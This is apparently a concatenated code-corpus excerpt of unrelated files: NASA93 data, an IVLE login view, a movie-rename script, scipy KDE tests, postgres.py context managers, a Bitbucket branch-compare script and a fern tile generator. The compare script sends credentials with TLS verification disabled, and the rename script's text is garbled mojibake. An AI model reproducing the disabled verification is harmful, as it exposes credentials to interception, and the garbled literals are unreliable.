[h,h,h,vh,h,n,h,l,n,n,n,n,h,h,n,n,h,n,n,h,n,n,282.1,1368,9820,37.3],
[h,h,h,vh,h,h,h,l,n,n,n,n,n,h,n,n,h,n,n,n,n,n,284.7,973,8518,38.1],
[h,h,h,vh,n,h,h,n,n,n,n,n,l,n,h,n,h,n,h,n,n,n,79,400,2327,26.9],
[h,h,h,vh,l,l,n,n,n,n,n,n,l,h,vh,n,h,n,h,n,n,n,423,2400,18447,41.9],
[h,h,h,vh,h,n,n,n,n,n,n,n,l,h,vh,n,vh,l,h,n,n,n,190,420,5092,30.3],
[h,h,h,vh,h,n,n,h,n,n,n,h,n,h,n,n,h,n,h,n,n,n,47.5,252,2007,22.3],
[h,h,h,vh,l,vh,n,xh,n,n,h,h,l,n,n,n,h,n,n,h,n,n,21,107,1058,21.3],
[h,h,h,vh,l,n,h,h,n,n,vh,n,n,h,h,n,h,n,h,n,n,n,78,571.4,4815,30.5],
[h,h,h,vh,l,n,h,h,n,n,vh,n,n,h,h,n,h,n,h,n,n,n,11.4,98.8,704,15.5],
[h,h,h,vh,l,n,h,h,n,n,vh,n,n,h,h,n,h,n,h,n,n,n,19.3,155,1191,18.6],
[h,h,h,vh,l,h,n,vh,n,n,h,h,l,h,n,n,n,h,h,n,n,n,101,750,4840,32.4],
[h,h,h,vh,l,h,n,h,n,n,h,h,l,n,n,n,h,n,n,n,n,n,219,2120,11761,42.8],
[h,h,h,vh,l,h,n,h,n,n,h,h,l,n,n,n,h,n,n,n,n,n,50,370,2685,25.4],
[h,h,h,vh,h,vh,h,h,n,n,vh,vh,n,vh,vh,n,vh,n,h,h,n,l,227,1181,6293,33.8],
[h,h,h,vh,h,n,h,vh,n,n,n,n,l,h,vh,n,n,l,n,n,n,l,70,278,2950,20.2],
[h,h,h,vh,h,h,l,h,n,n,n,n,l,n,n,n,n,n,h,n,n,l,0.9,8.4,28,4.9],
[h,h,h,vh,l,vh,l,xh,n,n,xh,vh,l,h,h,n,vh,vl,h,n,n,n,980,4560,50961,96.4],
[h,h,h,vh,n,n,l,h,n,n,n,n,l,vh,vh,n,n,h,h,n,n,n,350,720,8547,35.7],
[h,h,h,vh,h,h,n,xh,n,n,h,h,l,h,n,n,n,h,h,h,n,n,70,458,2404,27.5],
[h,h,h,vh,h,h,n,xh,n,n,h,h,l,h,n,n,n,h,h,h,n,n,271,2460,9308,43.4],
[h,h,h,vh,n,n,n,n,n,n,n,n,l,h,h,n,h,n,h,n,n,n,90,162,2743,25.0],
[h,h,h,vh,n,n,n,n,n,n,n,n,l,h,h,n,h,n,h,n,n,n,40,150,1219,18.9],
[h,h,h,vh,n,h,n,h,n,n,h,n,l,h,h,n,h,n,h,n,n,n,137,636,4210,32.2],
[h,h,h,vh,n,h,n,h,n,n,h,n,h,h,h,n,h,n,h,n,n,n,150,882,5848,36.2],
[h,h,h,vh,n,vh,n,h,n,n,h,n,l,h,h,n,h,n,h,n,n,n,339,444,8477,45.9],
[h,h,h,vh,n,l,h,l,n,n,n,n,h,h,h,n,h,n,h,n,n,n,240,192,10313,37.1],
[h,h,h,vh,l,h,n,h,n,n,n,vh,l,h,h,n,h,h,h,n,n,l,144,576,6129,28.8],
[h,h,h,vh,l,n,l,n,n,n,n,vh,l,h,h,n,h,h,h,n,n,l,151,432,6136,26.2],
[h,h,h,vh,l,n,l,h,n,n,n,vh,l,h,h,n,h,h,h,n,n,l,34,72,1555,16.2],
[h,h,h,vh,l,n,n,h,n,n,n,vh,l,h,h,n,h,h,h,n,n,l,98,300,4907,24.4],
[h,h,h,vh,l,n,n,h,n,n,n,vh,l,h,h,n,h,h,h,n,n,l,85,300,4256,23.2],
[h,h,h,vh,l,n,l,n,n,n,n,vh,l,h,h,n,h,h,h,n,n,l,20,240,813,12.8],
[h,h,h,vh,l,n,l,n,n,n,n,vh,l,h,h,n,h,h,h,n,n,l,111,600,4511,23.5],
[h,h,h,vh,l,h,vh,h,n,n,n,vh,l,h,h,n,h,h,h,n,n,l,162,756,7553,32.4],
[h,h,h,vh,l,h,h,vh,n,n,n,vh,l,h,h,n,h,h,h,n,n,l,352,1200,17597,42.9],
[h,h,h,vh,l,h,n,vh,n,n,n,vh,l,h,h,n,h,h,h,n,n,l,165,97,7867,31.5],
[h,h,h,vh,h,h,n,vh,n,n,h,h,l,h,n,n,n,h,h,n,n,n,60,409,2004,24.9],
[h,h,h,vh,h,h,n,vh,n,n,h,h,l,h,n,n,n,h,h,n,n,n,100,703,3340,29.6],
[h,h,h,vh,n,h,vh,vh,n,n,xh,xh,h,n,n,n,n,l,l,n,n,n,32,1350,2984,33.6],
[h,h,h,vh,h,h,h,h,n,n,vh,xh,h,h,h,n,h,h,h,n,n,n,53,480,2227,28.8],
[h,h,h,vh,h,h,l,vh,n,n,vh,xh,l,vh,vh,n,vh,vl,vl,h,n,n,41,599,1594,23.0],
[h,h,h,vh,h,h,l,vh,n,n,vh,xh,l,vh,vh,n,vh,vl,vl,h,n,n,24,430,933,19.2],
[h,h,h,vh,h,vh,h,vh,n,n,xh,xh,n,h,h,n,h,h,h,n,n,n,165,4178.2,6266,47.3],
[h,h,h,vh,h,vh,h,vh,n,n,xh,xh,n,h,h,n,h,h,h,n,n,n,65,1772.5,2468,34.5],
[h,h,h,vh,h,vh,h,vh,n,n,xh,xh,n,h,h,n,h,h,h,n,n,n,70,1645.9,2658,35.4],
[h,h,h,vh,h,vh,h,xh,n,n,xh,xh,n,h,h,n,h,h,h,n,n,n,50,1924.5,2102,34.2],
[h,h,h,vh,l,vh,l,vh,n,n,vh,xh,l,h,n,n,l,vl,l,h,n,n,7.25,648,406,15.6],
[h,h,h,vh,h,vh,h,vh,n,n,xh,xh,n,h,h,n,h,h,h,n,n,n,233,8211,8848,53.1],
[h,h,h,vh,n,h,n,vh,n,n,vh,vh,h,n,n,n,n,l,l,n,n,n,16.3,480,1253,21.5],
[h,h,h,vh,n,h,n,vh,n,n,vh,vh,h,n,n,n,n,l,l,n,n,n, 6.2, 12,477,15.4],
[h,h,h,vh,n,h,n,vh,n,n,vh,vh,h,n,n,n,n,l,l,n,n,n, 3.0, 38,231,12.0],
])
"""
Demo code:
"""
def _nasa93(): print(nasa93.__name__)
#_nasa93()
#if __name__ == '__main__': eval(todo('_nasa93()'))
|
dcoles/ivle
|
ivle/webapp/security/views.py
|
Python
|
gpl-2.0
| 6,811 | 0.001175 |
# IVLE
# Copyright (C) 2007-2009 The University of Melbourne
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA
# Author: Will Grant, Nick Chadwick
import urllib
import datetime
try:
import mod_python.Cookie
except ImportError:
# This needs to be importable from outside Apache.
pass
import ivle.pulldown_subj
import ivle.webapp.security
from ivle.auth import authenticate, AuthError
from ivle.webapp.base.xhtml import XHTMLView
from ivle.webapp.base.plugins import CookiePlugin
class LoginView(XHTMLView):
'''A view to allow a user to log in.'''
template = 'login.html'
allow_overlays = False
def authorize(self, req):
return True
def populate(self, req, ctx):
fields = req.get_fieldstorage()
nexturl = fields.getfirst('url')
# XXX Warning that Internet Explorer is unsupported
# Test if the user is in Internet Explorer
try:
useragent = req.headers_in['User-Agent']
# A bit of very basic UA string detection
ctx['msie'] = ('MSIE' in useragent
and 'AppleWebKit' not in useragent
and 'Gecko' not in useragent
and 'Opera' not in useragent)
except KeyError:
ctx['msie'] = False
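        # e.g. IE8 sends "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)",
        # which this check flags; UAs that also contain AppleWebKit, Gecko or
        # Opera tokens are treated as non-IE. (Illustrative UA string.)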
if nexturl is None:
nexturl = '/'
# We are already logged in. If it is a POST, they might be trying to
# clobber their session with some new credentials. That's their own
# business, so we let them do it. Otherwise, we don't bother prompting
# and just redirect to the destination.
# Note that req.user is None even if we are 'logged in', if the user is
# invalid (state != enabled, or expired).
if req.method != "POST" and req.user is not None:
req.throw_redirect(nexturl)
# Don't give any URL if we want /.
if nexturl == '/':
query_string = ''
else:
query_string = '?url=' + urllib.quote(nexturl, safe="/~")
ctx['path'] = req.make_path('+login') + query_string
# If this succeeds, the user is invalid.
user = ivle.webapp.security.get_user_details(req)
if user is not None:
if user.state == "no_agreement":
# Authenticated, but need to accept the ToS. Send them there.
# IMPORTANT NOTE FOR HACKERS: You can't simply disable this
# if you are not planning to display a ToS page - the ToS
# acceptance process actually calls usrmgt to create the user
                # jails and related stuff.
req.throw_redirect(req.make_path('+tos') + query_string)
elif user.state == "pending":
# FIXME: this isn't quite the right answer, but it
# should be more robust in the short term.
session = req.get_session()
session.invalidate()
session.delete()
user.state = u'no_agreement'
req.store.commit()
req.throw_redirect(nexturl)
if req.method == "POST":
# While req.user is normally set to get_user_details, it won't set
# it if the account isn't valid. So we get it ourselves.
user = ivle.webapp.security.get_user_details(req)
badlogin = None
username = fields.getfirst('user')
password = fields.getfirst('pass')
if username is not None:
# From this point onwards, we will be showing an error message
# if unsuccessful.
# Authenticate
if password is None:
badlogin = "No password supplied."
else:
user = None
try:
# Username is case insensitive
user = authenticate.authenticate(req.config, req.store,
username.value.lower(), password.value)
except AuthError, msg:
badlogin = msg
if user is None:
# Must have got an error. Do not authenticate.
# The except: above will have set a message.
pass
else:
# Success - Set the session and redirect to the URL.
session = req.get_session()
session['login'] = user.login
session.save()
session.unlock()
user.last_login = datetime.datetime.now()
# Create cookies for plugins that might request them.
for plugin in req.config.plugin_index[CookiePlugin]:
for cookie in plugin.cookies:
# The function can be None if they just need to be
# deleted at logout.
if plugin.cookies[cookie] is not None:
req.add_cookie(mod_python.Cookie.Cookie(cookie,
plugin.cookies[cookie](user), path='/'))
# Add any new enrolments.
ivle.pulldown_subj.enrol_user(req.config, req.store, user)
req.store.commit()
req.throw_redirect(nexturl)
# We didn't succeed.
# Render the login form with the error message.
ctx['error'] = badlogin
class LogoutView(XHTMLView):
'''A view to log the current session out.'''
template = 'logout.html'
allow_overlays = False
def authorize(self, req):
# This can be used by any authenticated user, even if they haven't
# accepted the ToS yet.
return ivle.webapp.security.get_user_details(req) is not None
def populate(self, req, ctx):
if req.method == "POST":
req.logout()
else:
ctx['path'] = req.make_path('+logout')
|
windcode/xtools
|
CleanMoviePrefix.py
|
Python
|
mit
| 1,426 | 0.019635 |
# coding=gbk
import os
import re
import string
def isMov(filename):
    # Check whether the file is a movie file
    suffix = filename.split('.')[-1].lower() # extract the extension
    pattern = re.compile(r'mpg|mpeg|m2v|mkv|dat|vob|avi|wmv|rm|ram|rmvb|mov|avi|mp4|qt|viv')
    if pattern.search(suffix): # does the extension match a movie format?
        return True
else:
return False
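# Illustrative: isMov("movie.MKV") -> True, isMov("readme.txt") -> False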
if __name__=='__main__':
# ±éÀúµ±Ç°Ä¿Â¼
print '´¦ÀíÖС¡'
cnt = 1
for fp in os.listdir(os.getcwd()):
if os.path.isfile(fp) and isMov(fp): # ÊǵçÓ°Îļþ
if fp[0]=='[': # È¥µô¿ªÍ·µÄ[]
index = fp.find(']')
if index!=-1:
print '[%d] %s ==> %s'%(cnt,fp,fp[index+1:])
|
os.rename(fp,fp[index+1:])
fp = fp[index+1:]
cnt+=1
elif fp[:2]=='¡¾': # È¥µô¿ªÍ·µÄ¡¾¡¿
index = fp.find('¡¿')
if index!=-1:
print '[%d] %s ==> %s'%(cnt,fp,fp[index+2:])
os.rename(fp,fp[index+2:])
fp = fp[index+2:]
cnt+=1
            if fp[0]=='.' or fp[0]=='-': # strip a leading '.' or '-'
                print '[%d] %s ==> %s'%(cnt,fp,fp[1:])
                os.rename(fp,fp[1:])
                cnt+=1 # count this rename so the final summary stays accurate
if cnt==1:
        print 'No movie files needed processing'
else:
        print 'Processing complete'
|
GbalsaC/bitnamiP
|
venv/lib/python2.7/site-packages/scipy/stats/tests/test_kdeoth.py
|
Python
|
agpl-3.0
| 6,021 | 0.000997 |
from __future__ import division, print_function, absolute_import
from scipy import stats
import numpy as np
from numpy.testing import assert_almost_equal, assert_, assert_raises, \
assert_array_almost_equal, assert_array_almost_equal_nulp, run_module_suite
def test_kde_1d():
#some basic tests comparing to normal distribution
np.random.seed(8765678)
n_basesample = 500
xn = np.random.randn(n_basesample)
xnmean = xn.mean()
xnstd = xn.std(ddof=1)
# get kde for original sample
gkde = stats.gaussian_kde(xn)
# evaluate the density function for the kde for some points
xs = np.linspace(-7,7,501)
kdepdf = gkde.evaluate(xs)
normpdf = stats.norm.pdf(xs, loc=xnmean, scale=xnstd)
intervall = xs[1] - xs[0]
assert_(np.sum((kdepdf - normpdf)**2)*intervall < 0.01)
prob1 = gkde.integrate_box_1d(xnmean, np.inf)
prob2 = gkde.integrate_box_1d(-np.inf, xnmean)
assert_almost_equal(prob1, 0.5, decimal=1)
assert_almost_equal(prob2, 0.5, decimal=1)
assert_almost_equal(gkde.integrate_box(xnmean, np.inf), prob1, decimal=13)
assert_almost_equal(gkde.integrate_box(-np.inf, xnmean), prob2, decimal=13)
assert_almost_equal(gkde.integrate_kde(gkde),
(kdepdf**2).sum()*intervall, decimal=2)
assert_almost_equal(gkde.integrate_gaussian(xnmean, xnstd**2),
(kdepdf*normpdf).sum()*intervall, decimal=2)
def test_kde_bandwidth_method():
def scotts_factor(kde_obj):
"""Same as default, just check that it works."""
return np.power(kde_obj.n, -1./(kde_obj.d+4))
np.random.seed(8765678)
n_basesample = 50
xn = np.random.randn(n_basesample)
# Default
gkde = stats.gaussian_kde(xn)
# Supply a callable
gkde2 = stats.gaussian_kde(xn, bw_method=scotts_factor)
# Supply a scalar
gkde3 = stats.gaussian_kde(xn, bw_method=gkde.factor)
xs = np.linspace(-7,7,51)
kdepdf = gkde.evaluate(xs)
kdepdf2 = gkde2.evaluate(xs)
assert_almost_equal(kdepdf, kdepdf2)
kdepdf3 = gkde3.evaluate(xs)
assert_almost_equal(kdepdf, kdepdf3)
assert_raises(ValueError, stats.gaussian_kde, xn, bw_method='wrongstring')
# Subclasses that should stay working (extracted from various sources).
# Unfortunately the earlier design of gaussian_kde made it necessary for users
# to create these kinds of subclasses, or call _compute_covariance() directly.
class _kde_subclass1(stats.gaussian_kde):
def __init__(self, dataset):
self.dataset = np.atleast_2d(dataset)
self.d, self.n = self.dataset.shape
self.covariance_factor = self.scotts_factor
self._compute_covariance()
class _kde_subclass2(stats.gaussian_kde):
def __init__(self, dataset):
self.covariance_factor = self.scotts_factor
super(_kde_subclass2, self).__init__(dataset)
class _kde_subclass3(stats.gaussian_kde):
def __init__(self, dataset, covariance):
self.covariance = covariance
stats.gaussian_kde.__init__(self, dataset)
def _compute_covariance(self):
self.inv_cov = np.linalg.inv(self.covariance)
self._norm_factor = np.sqrt(np.linalg.det(2*np.pi * self.covariance)) \
* self.n
class _kde_subclass4(stats.gaussian_kde):
def covariance_factor(self):
return 0.5 * self.silverman_factor()
def test_gaussian_kde_subclassing():
x1 = np.array([-7, -5, 1, 4, 5], dtype=np.float)
xs = np.linspace(-10, 10, num=50)
# gaussian_kde itself
kde = stats.gaussian_kde(x1)
ys = kde(xs)
# subclass 1
kde1 = _kde_subclass1(x1)
y1 = kde1(xs)
assert_array_almost_equal_nulp(ys, y1, nulp=10)
# subclass 2
kde2 = _kde_subclass2(x1)
y2 = kde2(xs)
assert_array_almost_equal_nulp(ys, y2, nulp=10)
# subclass 3
kde3 = _kde_subclass3(x1, kde.covariance)
y3 = kde3(xs)
assert_array_almost_equal_nulp(ys, y3, nulp=10)
# subclass 4
kde4 = _kde_subclass4(x1)
y4 = kde4(x1)
y_expected = [0.06292987, 0.06346938, 0.05860291, 0.08657652, 0.07904017]
assert_array_almost_equal(y_expected, y4, decimal=6)
# Not a subclass, but check for use of _compute_covariance()
kde5 = kde
kde5.covariance_factor = lambda: kde.factor
kde5._compute_covariance()
y5 = kde5(xs)
assert_array_almost_equal_nulp(ys, y5, nulp=10)
def test_gaussian_kde_covariance_caching():
x1 = np.array([-7, -5, 1, 4, 5], dtype=np.float)
xs = np.linspace(-10, 10, num=5)
# These expected values are from scipy 0.10, before some changes to
# gaussian_kde. They were not compared with any external reference.
y_expected = [0.02463386, 0.04689208, 0.05395444, 0.05337754, 0.01664475]
# Set the bandwidth, then reset it to the default.
kde = stats.gaussian_kde(x1)
kde.set_bandwidth(bw_method=0.5)
kde.set_bandwidth(bw_method='scott')
y2 = kde(xs)
assert_array_almost_equal(y_expected, y2, decimal=7)
def test_gaussian_kde_monkeypatch():
"""Ugly, but people may rely on this. See scipy pull request 123,
specifically the linked ML thread "Width of the Gaussian in stats.kde".
If it is necessary to break this later on, that is to be discussed on ML.
"""
x1 = np.array([-7, -5, 1, 4, 5], dtype=np.float)
xs = np.linspace(-10, 10, num=50)
# The old monkeypatched version to get at Silverman's Rule.
kde = stats.gaussian_kde(x1)
kde.covariance_factor = kde.silverman_factor
kde._compute_covariance()
y1 = kde(xs)
# The new saner version.
kde2 = stats.gaussian_kde(x1, bw_method='silverman')
y2 = kde2(xs)
assert_array_almost_equal_nulp(y1, y2, nulp=10)
def test_kde_integer_input():
"""Regression test for #1181."""
x1 = np.arange(5)
kde = stats.gaussian_kde(x1)
y_expected = [0.13480721, 0.18222869, 0.19514935, 0.18222869, 0.13480721]
assert_array_almost_equal(kde(x1), y_expected, decimal=6)
if __name__ == "__main__":
run_module_suite()
|
gratipay/postgres.py
|
postgres/context_managers.py
|
Python
|
mit
| 5,280 | 0.001136 |
from psycopg2 import InterfaceError
class CursorContextManager:
"""Instantiated once per :func:`~postgres.Postgres.get_cursor` call.
:param pool: see :mod:`psycopg2_pool`
:param bool autocommit: see :attr:`psycopg2:connection.autocommit`
:param bool readonly: see :attr:`psycopg2:connection.readonly`
:param cursor_kwargs: passed to :meth:`psycopg2:connection.cursor`
During construction, a connection is checked out of the connection pool
and its :attr:`autocommit` and :attr:`readonly` attributes are set, then a
:class:`psycopg2:cursor` is created from that connection.
Upon exit of the ``with`` block, the connection is rolled back if an
exception was raised, or committed otherwise. There are two exceptions to
this:
1. if :attr:`autocommit` is :obj:`True`, then the connection is neither
rolled back nor committed;
2. if :attr:`readonly` is :obj:`True`, then the connection is always rolled
back, never committed.
In all cases the cursor is closed and the connection is put back in the pool.
"""
__slots__ = ('pool', 'conn', 'cursor')
def __init__(self, pool, autocommit=False, readonly=False, **cursor_kwargs):
self.pool = pool
conn = self.pool.getconn()
conn.autocommit = autocommit
conn.readonly = readonly
self.cursor = conn.cursor(**cursor_kwargs)
self.conn = conn
def __enter__(self):
return self.cursor
def __exit__(self, exc_type, exc_val, exc_tb):
"""Put our connection back in the pool.
"""
self.cursor.close()
self.conn.__exit__(exc_type, exc_val, exc_tb)
self.pool.putconn(self.conn)
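# Hedged usage sketch (not part of this module; 'db' and the DSN are
# hypothetical). Postgres.get_cursor() returns a CursorContextManager:
#
#     db = Postgres("postgres://user@localhost/db")
#     with db.get_cursor() as cursor:
#         cursor.execute("UPDATE foo SET bar = %s", (42,))
#
# A clean exit commits; an exception rolls back (subject to the
# autocommit/readonly exceptions documented above).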
class ConnectionCursorContextManager:
"""Creates a cursor from the given connection, then wraps it in a context
manager that automatically commits or rolls back the changes on exit.
:param conn: a :class:`psycopg2:connection`
:param bool autocommit: see :attr:`psycopg2:connection.autocommit`
:param bool readonly: see :attr:`psycopg2:connection.readonly`
:param cursor_kwargs: passed to :meth:`psycopg2:connection.cursor`
During construction, the connection's :attr:`autocommit` and :attr:`readonly`
attributes are set, then :meth:`psycopg2:connection.cursor` is called with
`cursor_kwargs`.
Upon exit of the ``with`` block, the connection is rolled back if an
exception was raised, or committed otherwise. There are two exceptions to
this:
    1. if :attr:`autocommit` is :obj:`True`, then the connection is neither
rolled back nor committed;
2. if :attr:`readonly` is :obj:`True`, then the connection is always rolled
back, never committed.
In all cases the cursor is closed.
"""
__slots__ = ('conn', 'cursor')
def __init__(self, conn, autocommit=False, readonly=False, **cursor_kwargs):
conn.autocommit = autocommit
conn.readonly = readonly
self.conn = conn
self.cursor = conn.cursor(**cursor_kwargs)
def __enter__(self):
return self.cursor
def __exit__(self, exc_type, exc_val, exc_tb):
self.cursor.close()
self.conn.__exit__(exc_type, exc_val, exc_tb)
class CursorSubcontextManager:
"""Wraps a cursor so that it can be used for a subtransaction.
See :meth:`~postgres.Postgres.get_cursor` for an explanation of subtransactions.
:param cursor: the :class:`psycopg2:cursor` to wrap
:param back_as: temporarily overwrites the cursor's
:attr:`~postgres.cursors.SimpleCursorBase.back_as` attribute
"""
__slots__ = ('cursor', 'back_as', 'outer_back_as')
PRESERVE = object()
def __init__(self, cursor, back_as=PRESERVE):
self.cursor = cursor
self.back_as = back_as
def __enter__(self):
if self.back_as is not self.PRESERVE:
self.outer_back_as = self.cursor.back_as
self.cursor.back_as = self.back_as
return self.cursor
def __exit__(self, exc_type, exc_val, exc_tb):
if self.back_as is not self.PRESERVE:
self.cursor.back_as = self.outer_back_as
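# Hedged sketch (names taken from the class above): a CursorSubcontextManager
# temporarily swaps back_as on an existing cursor and restores it on exit:
#
#     with CursorSubcontextManager(cursor, back_as='dict') as c:
#         ...  # same cursor, rows now come back as dicts
#     # cursor.back_as is back to its previous value here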
class ConnectionContextManager:
"""Instantiated once per :func:`~postgres.Postgres.get_connection` call.
:param pool: see :mod:`psycopg2_pool`
:param bool autocommit: see :attr:`psycopg2:connection.autocommit`
:param bool readonly: see :attr:`psycopg2:connection.readonly`
This context manager checks out a connection out of the specified pool, sets
its :attr:`autocommit` and :attr:`readonly` attributes.
The :meth:`__enter__` method returns the :class:`~postgres.Connection`.
The :meth:`__exit__` method rolls back the connection and puts it back in
the pool.
"""
__slots__ = ('pool', 'conn')
def __init__(self, pool, autocommit=False, readonly=False):
self.pool = pool
conn = self.pool.getconn()
conn.autocommit = autocommit
conn.readonly = readonly
self.conn = conn
def __enter__(self):
return self.conn
def __exit__(self, *exc_info):
"""Put our connection back in the pool.
"""
try:
self.conn.rollback()
except InterfaceError:
pass
self.pool.putconn(self.conn)
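# Hedged usage sketch: Postgres.get_connection() returns this context manager.
# Since the connection is always rolled back on exit, it suits read-only work:
#
#     with db.get_connection() as connection:   # 'db' as in the sketch above
#         cursor = connection.cursor()
#         cursor.execute("SELECT 1")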
|
gwsu2008/automation
|
python/git-branch-diff.py
|
Python
|
gpl-2.0
| 3,650 | 0.001644 |
#!/usr/bin/env python3
import urllib3
import sys
import os
import json
from datetime import datetime
import urllib.parse
import requests
import time
import argparse
urllib3.disable_warnings()
debug = os.getenv('DEBUG', 0)
batch_size = 100
workspace = os.getenv('WORKSPACE', os.getcwd())
user_name = 'jenkins-testerdh'
user_password = os.getenv('JENKINS_PASSWD', "None")
def json_serial(obj):
if isinstance(obj, datetime):
serial = obj.isoformat()
return serial
raise TypeError("Type not serializable")
def json_print(json_obj):
return json.dumps(json_obj, indent=4, sort_keys=True, default=json_serial)
def request_get(url):
r = requests.get(url, auth=(user_name, user_password), verify=False)
return r
def info(msg):
print('\033[34m[Info]\033[0m {}'.format(msg))
return
def warn(msg):
print('\033[33m[Warn]\033[0m {}'.format(msg))
sys.exit(1)
def error(msg):
print('\033[31m[Error]\033[0m {}'.format(msg))
sys.exit(1)
def parse_args():
parser = argparse.ArgumentParser(description='Compare dev and master branch.')
    parser.add_argument('--repo-url', '-r', default=None, dest='repo_url',
                        help='Git clone URL with ssh syntax')
args, unknown = parser.parse_known_args()
return args, unknown
def main(argv):
start_time = time.time()
args, unknown = parse_args()
info('Starting')
info('Workspace {}'.format(workspace))
master_merge_file = '{}/merge.master'.format(workspace)
from_dev = urllib.parse.quote_plus('refs/heads/dev')
to_master = urllib.parse.quote_plus('refs/heads/master')
project_url = None
if args.repo_url is None:
error('--repo-url is not defined.')
return 1
try:
git_host = args.repo_url.split('@')[1]
git_url = 'https://{}/rest/api/1.0/projects'.format(git_host.split(':')[0])
project_key = args.repo_url.split('/')[3]
repo_name = args.repo_url.split('/')[-1:][0]
repo_name = repo_name.replace('.git', '')
project_url = '{}/{}/repos/{}'.format(git_url, project_key, repo_name)
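        # Illustration with a hypothetical clone URL
        # 'ssh://git@git.example.com:7999/PROJ/myrepo.git', this yields
        # project_url = 'https://git.example.com/rest/api/1.0/projects/PROJ/repos/myrepo'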
if debug == 1:
info(project_url)
except IndexError:
error('Git clone repo url unknown format.')
response = request_get(project_url)
if int(response.status_code) == 200:
if 'id' in response.json():
repo_id = response.json()['id']
else:
error('Repository ID not found.')
error(response.json())
return 1
else:
error('HTTP error {}'.format(response.status_code))
return 1
compare_branch = 'compare/commits?from={}&to={}&fromRepo={}&limit=1'.format(from_dev, to_master, repo_id)
compare_url = '{}/{}'.format(project_url, compare_branch)
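    # Continuing the hypothetical above (repo_id 42), compare_url becomes:
    # https://git.example.com/rest/api/1.0/projects/PROJ/repos/myrepo/compare/commits?from=refs%2Fheads%2Fdev&to=refs%2Fheads%2Fmaster&fromRepo=42&limit=1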
if debug == 1:
info(compare_url)
response = request_get(compare_url)
if int(response.status_code) == 200:
if debug == 1:
info('Headers: {}'.format(dict(response.headers)))
info('Encoding: {}'.format(response.encoding))
info('Text: {}'.format(response.json()))
change_size = response.json()['size']
if change_size == 0:
info('{} has no change between branch dev and master'.format(args.repo_url))
else:
info('{} changes between branch dev and master'.format(args.repo_url))
master_merge_fh = open(master_merge_file, 'w')
master_merge_fh.close()
else:
error('HTTP error {}'.format(response.status_code))
info('Finished - execution time %.2f seconds' % (time.time() - start_time))
return
if __name__ == "__main__":
sys.exit(main(sys.argv))
|
davidar/pyzui
|
pyzui/ferntileprovider.py
|
Python
|
gpl-2.0
| 4,684 | 0.009821 |
## PyZUI 0.1 - Python Zooming User Interface
## Copyright (C) 2009 David Roberts <d@vidr.cc>
##
## This program is free software; you can redistribute it and/or
## modify it under the terms of the GNU General Public License
## as published by the Free Software Foundation; either version 2
## of the License, or (at your option) any later version.
##
## This program is distributed in the hope that it will be useful,
## but WITHOUT ANY WARRANTY; without even the implied warranty of
## MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
## GNU General Public License for more details.
##
## You should have received a copy of the GNU General Public License
## along with this program; if not, write to the Free Software
## Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA
## 02110-1301, USA.
"""Dynamic tile provider for Barnsley's fern."""
import random
import Image
from dynamictileprovider import DynamicTileProvider
class FernTileProvider(DynamicTileProvider):
"""FernTileProvider objects are used for generating tiles of Barnsley's
fern iterated function system.
Constructor: FernTileProvider(TileCache)
"""
def __init__(self, tilecache):
DynamicTileProvider.__init__(self, tilecache)
filext = 'png'
tilesize = 256
aspect_ratio = 1.0
max_iterations = 50000
max_points = 10000
transformations = [
## (probability, (a, b, c, d, e, f))
## x_n+1 = a*x_n + b*y_n + c
## y_n+1 = d*x_n + e*y_n + f
## for details about the transformations, see:
## <http://en.wikipedia.org/wiki/Barnsley's_fern>
## <http://books.google.com/books?id=oh7NoePgmOIC
## &printsec=frontcover#PPA86,M1>
## <http://mathworld.wolfram.com/BarnsleysFern.html>
## <http://www.home.aone.net.au/~byzantium/ferns/fractal.html>
## rachis
(0.01, ( 0.00, 0.00, 0.00, 0.00, 0.16, 0.00)),
## left hand first pinna
(0.07, ( 0.20, -0.26, 0.00, 0.23, 0.22, 1.60)),
## right hand first pinna
(0.07, (-0.15, 0.28, 0.00, 0.26, 0.24, 0.44)),
## body of fern
(0.85, ( 0.85, 0.04, 0.00, -0.04, 0.85, 1.60)),
]
color = (100, 170, 0)
def __choose_transformation(self):
"""Randomly choose a transformation based on the probability of each
transformation being chosen.
__choose_transformation() -> tuple<float,float,float,float,float,float>
"""
n = random.uniform(0,1)
for probability, transformation in self.transformations:
if n <= probability:
break
else:
n -= probability
return transformation
def __transform(self, x, y):
"""Randomly choose a transformation and apply it to x and y, returning
the result as a tuple.
__transform(float, float) -> tuple<float,float>
"""
t = self.__choose_transformation()
x_new = t[0]*x + t[1]*y + t[2]
y_new = t[3]*x + t[4]*y + t[5]
return (x_new,y_new)
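    # For example, the "body of fern" map (probability 0.85) sends the origin
    # (0, 0) to (0.85*0 + 0.04*0 + 0.00, -0.04*0 + 0.85*0 + 1.60) = (0.0, 1.6).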
    def __draw_point(self, tile, x, y, tilesize_units):
        """Draw the given point on the given tile.
        __draw_point(Image, float, float, float) -> None
        Precondition: 0.0 <= x <= tilesize_units
        Precondition: 0.0 <= y <= tilesize_units
"""
x = x * self.tilesize / tilesize_units
x = min(int(x), self.tilesize-1)
y = y * self.tilesize / tilesize_units
y = min(int(self.tilesize - y), self.tilesize-1)
tile.putpixel((x,y), self.color)
def _load_dynamic(self, tile_id, outfile):
media_id, tilelevel, row, col = tile_id
if row < 0 or col < 0 or \
row > 2**tilelevel - 1 or col > 2**tilelevel - 1:
## row,col out of range
return
tilesize_units = 10.0 * 2**-tilelevel
x = col * tilesize_units
y = row * tilesize_units
## the corners of the tile are:
## (x1,y2) +----+ (x2,y2)
## | |
## (x1,y1) +----+ (x2,y1)
x1 = x - 5.0
y2 = 10.0 - y
x2 = x1 + tilesize_units
y1 = y2 - tilesize_units
tile = Image.new('RGB', (self.tilesize,self.tilesize))
num_points = 0
x = 0.0
y = 0.0
for i in xrange(self.max_iterations):
if x1 <= x <= x2 and y1 <= y <= y2:
self.__draw_point(
tile, x-x1, y-y1, tilesize_units)
num_points += 1
if num_points > self.max_points:
break
x,y = self.__transform(x,y)
tile.save(outfile)
|
olexiim/edx-platform
|
lms/djangoapps/mobile_api/users/tests.py
|
